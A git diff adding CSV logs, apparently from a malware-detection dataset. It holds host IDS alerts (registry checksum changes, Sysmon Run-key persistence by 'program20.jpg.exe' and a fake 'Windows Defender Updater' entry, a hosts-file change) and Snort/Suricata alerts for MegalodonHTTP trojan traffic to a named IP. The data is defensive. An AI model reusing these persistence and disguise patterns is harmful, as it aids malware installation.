b/data/MW_20_HIDS_3.csv 
@@ -0,0 +1,105 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 14:01:55.865",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4968; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",, +"May 23, 2020 @ 14:00:34.411",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'c15d2e9c96671b8872cf0d2a57fec081' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'b2af176be91669f2eb3bf9b19bc132d2a738d137' +" +"May 23, 2020 @ 14:00:34.396",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '2fc71ce4c081663302e1c9fa9f610388' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '57a5eef25dac857d9b917e1964c7aeb308358411' +" +"May 23, 2020 @ 13:59:58.520",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 23, 2020 @ 13:59:37.018",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 13:59:30.192 +ProcessGuid: {df9fc3d3-2c3b-5ec9-0000-00100b730a00} +ProcessId: 6640 +Image: C:\Users\John Williams\Downloads\program20.jpg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\hetsm.exe +Details: C:\Users\John Williams\Downloads\program20.jpg.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T13:59:30.201635300Z"",""eventRecordID"":""1364"",""processID"":""2176"",""threadID"":""3152"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 13:59:30.192\r\nProcessGuid: {df9fc3d3-2c3b-5ec9-0000-00100b730a00}\r\nProcessId: 6640\r\nImage: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\hetsm.exe\r\nDetails: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 13:59:30.192"",""processGuid"":""{df9fc3d3-2c3b-5ec9-0000-00100b730a00}"",""processId"":""6640"",""image"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\program20.jpg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\hetsm.exe"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe""}}}" +"May 23, 2020 @ 13:59:05.260",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 13:58:55.522",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 13:58:18.909",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:55:21.757",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 13:54:03.217",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:54:03.207",8,"Windows Audit Policy changed","""System audit policy was changed. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:53:56.810",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 23, 2020 @ 13:53:55.731",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '4cea2c835f70071dc02ed62b073dfba8' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '77e72a40def388a760e7dd5d34aee517e6c01817' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 23, 2020 @ 13:53:55.715",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'f09b8f706fbbdc831b56268167855de8' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '765494a3d04df5b143fa79ecd655484a9d80378a' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" +"May 23, 2020 @ 13:53:45.811",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:36.820 +ProcessGuid: {df9fc3d3-d12c-5ec7-0000-00100d391400} +ProcessId: 5604 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\FB_B1D7.tmp.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:36.833089600Z"",""eventRecordID"":""930"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:36.820\r\nProcessGuid: {df9fc3d3-d12c-5ec7-0000-00100d391400}\r\nProcessId: 5604\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\FB_B1D7.tmp.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Defender Updater\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:18:36.820"",""processGuid"":""{df9fc3d3-d12c-5ec7-0000-00100d391400}"",""processId"":""5604"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\FB_B1D7.tmp.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Windows Defender Updater"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start""}}}" +"May 23, 2020 @ 13:53:44.905",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:34.788 +ProcessGuid: {df9fc3d3-d129-5ec7-0000-0010fad01300} +ProcessId: 2624 +Image: C:\Users\John Williams\Downloads\program20.jpg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\hetsm.exe +Details: C:\Users\John Williams\Downloads\program20.jpg.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:34.796003200Z"",""eventRecordID"":""919"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:34.788\r\nProcessGuid: {df9fc3d3-d129-5ec7-0000-0010fad01300}\r\nProcessId: 2624\r\nImage: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\hetsm.exe\r\nDetails: C:\\Users\\John 
Williams\\Downloads\\program20.jpg.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:34.788"",""processGuid"":""{df9fc3d3-d129-5ec7-0000-0010fad01300}"",""processId"":""2624"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\hetsm.exe"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe""}}}" diff --git a/data/MW_20_NIDS.csv b/data/MW_20_NIDS.csv new file mode 100644 index 0000000..67ef22d --- /dev/null +++ b/data/MW_20_NIDS.csv 
@@ -0,0 +1,9 @@ +"@timestamp",message,"log.file.path" +"Apr 6, 2020 @ 10:17:20.837","04/06-10:17:16.970363 [**] [1:2022127:3] ET TROJAN MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:17:20.837","04/06-10:17:16.970363 [**] [1:2022818:1] ET TROJAN Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:17:20.835","04/06/2020-10:17:17.204719 [**] [1:2022127:3] ET MALWARE MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:17:20.835","04/06/2020-10:17:17.204719 [**] [1:2022818:3] ET MALWARE Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.745","04/06/2020-10:11:51.070770 [**] [1:2022127:3] ET MALWARE MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.745","04/06/2020-10:11:51.070770 [**] [1:2022818:3] ET MALWARE Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.735","04/06-10:11:50.715964 [**] [1:2022127:3] ET TROJAN MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:12:00.735","04/06-10:11:50.715964 [**] [1:2022818:1] ET TROJAN Generic gate[.].php GET with minimal 
headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/snort/alert.fast" diff --git a/data/MW_21_HIDS_1.csv b/data/MW_21_HIDS_1.csv new file mode 100644 index 0000000..fc5e100 --- /dev/null +++ b/data/MW_21_HIDS_1.csv 
@@ -0,0 +1,514 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 13:34:12.332",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'eb0cf951f9de7afccabaea6b60c0dbdf' +New md5sum is : '3c1f1f29b15b6f4d446adbaa7478227e' +Old sha1sum was: '88ef24bc6d4f6900ac8e7ced4ee9d1e398b2fee7' +New sha1sum is : 'd8b476899b5b713c7be8d3ca5bd35f82ec170237' +" +"Apr 6, 2020 @ 13:34:12.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4062f37ccf7d56610f362ada03708d00' +New md5sum is : '15547e4fb85460cc47771d918274be6c' +Old sha1sum was: 'f6dd2487084220312ab754081fd9377caef7cb48' +New sha1sum is : '74202fd66188b6ca0549f7734ff08185aa74db9e' +" +"Apr 6, 2020 @ 13:33:16.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a22f75cfaec4ad1b3c6df4a877bca015' +New md5sum is : 'ca4d63b3a13c78c0aea16486c81158e5' +Old sha1sum was: 'c661a399d9af12513997815526adef9491bd9698' +New sha1sum is : '7409f0ebded1a5d782ee4fe089e06a887046f653' +" +"Apr 6, 2020 @ 13:31:59.525",7,"Integrity checksum changed.","File 'c:\windows\system32\drivers\etc\hosts' checksum changed. 
+Size changed from '824' to '2103' +Old md5sum was: '3688374325b992def12793500307566d' +New md5sum is : 'a4eca8014112a13122660b77e6f9eca2' +Old sha1sum was: '4bed0823746a2a8577ab08ac8711b79770e48274' +New sha1sum is : '07cce3458b422d02db7ad9cfbe227369ab2aa072' +Old sha256sum was: '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +New sha256sum is : 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +Old modification time was: 'Tue Mar 19 04:49:40 2019', now it is 'Sat Apr 4 15:55:41 2020' +" +"Apr 6, 2020 @ 13:31:59.424",7,"Integrity checksum changed.","File 'c:\windows\sysnative\drivers\etc\hosts' checksum changed. +Size changed from '824' to '2103' +Old md5sum was: '3688374325b992def12793500307566d' +New md5sum is : 'a4eca8014112a13122660b77e6f9eca2' +Old sha1sum was: '4bed0823746a2a8577ab08ac8711b79770e48274' +New sha1sum is : '07cce3458b422d02db7ad9cfbe227369ab2aa072' +Old sha256sum was: '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +New sha256sum is : 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +Old modification time was: 'Tue Mar 19 04:49:40 2019', now it is 'Sat Apr 4 15:55:41 2020' +" +"Apr 6, 2020 @ 13:31:47.355",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 13:31:43.946",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 13:30:47.605",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'b7473c84bd0bad1488a5c2c9e3e6f10e' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '384fc31f48a5bdda9486f16da196a6ca2e287525' +" +"Apr 6, 2020 @ 13:30:47.590",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : 'fa3b7adf38200ede47c4808154156712' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : 'ce3b1ac12870460a712aea1c917e619ec24be518' +" +"Apr 6, 2020 @ 13:30:43.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:43.949",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:35.151",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 13:30:35.104",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '533a94b2450e9da9730f3a8885fa28e2' +New md5sum is : 'eb0cf951f9de7afccabaea6b60c0dbdf' +Old sha1sum was: '9672846ee400d5d6a6606768e5f890ec38b068f7' +New sha1sum is : '88ef24bc6d4f6900ac8e7ced4ee9d1e398b2fee7' +" +"Apr 6, 2020 @ 13:30:35.087",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: 'd63d1a2fa60db9999c4fc04f5bc8fdd6' +New md5sum is : '4062f37ccf7d56610f362ada03708d00' +Old sha1sum was: '41b7674c2a780a3d91a2498b0320f63b453edc78' +New sha1sum is : 'f6dd2487084220312ab754081fd9377caef7cb48' +" +"Apr 6, 2020 @ 13:30:34.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '0b3936dadbdfaec6b81d713fa992d6f4' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'c7a478d2a4a0a4263d4e588e787fdb7365123205' +" +"Apr 6, 2020 @ 13:30:33.122",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:30:32.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : 'c34dba122b585a1a9fc22f989595a44d' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '13bfcb7f528aac84a974a2b81bfa80d7ff9044eb' +" +"Apr 6, 2020 @ 13:30:32.464",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:32.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:32.274",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : 'b48da839ebcc8fd3a431cbe7afcdf7db' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '5195811f2b346097acfba0ad56e24cc27e0880d4' +" +"Apr 6, 2020 @ 13:30:31.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '5058b6566544015230dcf294c7d65602' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'c5dc49dba107b0b0c04dd16ef44c114e5aca3cc7' +" +"Apr 6, 2020 @ 13:30:31.274",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:31.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:31.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:30:28.665",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : 'abcf5555a1da768678af92dfe0c6d696' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '14b9c4ed780b00e384e8a1a1a64a6d384c174d76' +" +"Apr 6, 2020 @ 13:30:25.152",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. 
+Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 13:30:23.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 6, 2020 @ 13:30:23.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '606d75503289ffec78fec11236a6353e' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '33248c131c57ed1e3d99fa341dabe7bf3cbac974' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 6, 2020 @ 13:30:22.092",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:30:20.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rtop' was added. +" +"Apr 6, 2020 @ 13:30:16.793",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:30:16.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 13:30:14.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2e21c' was added. 
+" +"Apr 6, 2020 @ 13:30:14.167",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:13.527",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:13.510",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:12.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:12.073",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:09.597",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:30:07.470",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '96a9b30c9b670b5333e983dfff05161e' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '1f4308d6a0398f5915ad9c727b72a267522aeb07' +" +"Apr 6, 2020 @ 13:30:06.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
